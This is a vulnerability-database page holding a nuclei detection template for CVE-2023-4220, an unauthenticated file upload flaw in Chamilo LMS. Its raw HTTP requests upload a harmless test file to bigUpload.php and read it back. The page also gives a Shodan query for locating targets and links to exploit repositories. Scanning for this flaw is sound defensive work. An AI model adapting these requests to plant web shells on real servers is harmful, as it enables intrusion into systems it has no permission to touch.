Lucene search
K

Chamilo LMS <= 1.11.24 - Remote Code Execution

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 634 Views

Chamilo LMS <= 1.11.24 - Unrestricted file upload allows remote code execution

Related
Refs
Code
id: CVE-2023-4220

info:
  name: Chamilo LMS <= 1.11.24 - Remote Code Execution
  author: s4e-io
  severity: medium
  description: |
    Unrestricted file upload in big file upload functionality in `/main/inc/lib/javascript/bigupload/inc/bigUpload.php` in Chamilo LMS <= v1.11.24 allows unauthenticated attackers to perform stored cross-site scripting attacks and obtain remote code execution via uploading of web shell.
  impact: |
    Unauthenticated attackers can upload arbitrary files including web shells through the bigUpload functionality, potentially achieving remote code execution and compromising the entire Chamilo LMS learning management system.
  remediation: |
    Update Chamilo LMS to a version newer than 1.11.24 that validates file types and extensions in bigUpload.php and restricts uploads to safe file types only.
  reference:
    - https://github.com/Ziad-Sakr/Chamilo-LMS-CVE-2023-4220-Exploit
    - https://github.com/charlesgargasson/CVE-2023-4220
    - https://starlabs.sg/advisories/23/23-4220/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4220
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-4220
    cwe-id: CWE-434
    epss-score: 0.76084
    epss-percentile: 0.99472
    cpe: cpe:2.3:a:chamilo:chamilo_lms:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: chamilo
    product: chamilo_lms
    shodan-query: "X-Powered-By: Chamilo"
  tags: cve,cve2023,chamilo,lms,rce,intrusive,file-upload,vkev,vuln

variables:
  filename: "{{rand_base(10)}}"
  num: "{{rand_int(1000, 9999)}}"

http:
  - raw:
      - |
        POST /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=------------------------SwxF5rRaZb4lETWlpulXn3

        --------------------------SwxF5rRaZb4lETWlpulXn3
        Content-Disposition: form-data; name="bigUploadFile"; filename="{{filename}}.txt"
        Content-Type: application/octet-stream

        {{md5(num)}}

        --------------------------SwxF5rRaZb4lETWlpulXn3--

      - |
        GET /main/inc/lib/javascript/bigupload/files/{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2,"{{md5(num)}}")'
          - "status_code_1 == 200 && status_code_2 == 200"
        condition: and
# digest: 490a004630440220718eeaa4253b98378b973ea40caa3c8a24057aee54dd6f520d89526d5e38ab4802204fceb5b4aeeb1e65e6e3e884665c643785b3429ff7a798964e6ef2e64d3bd0f1:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.16.1 - 8.1
EPSS0.76084
634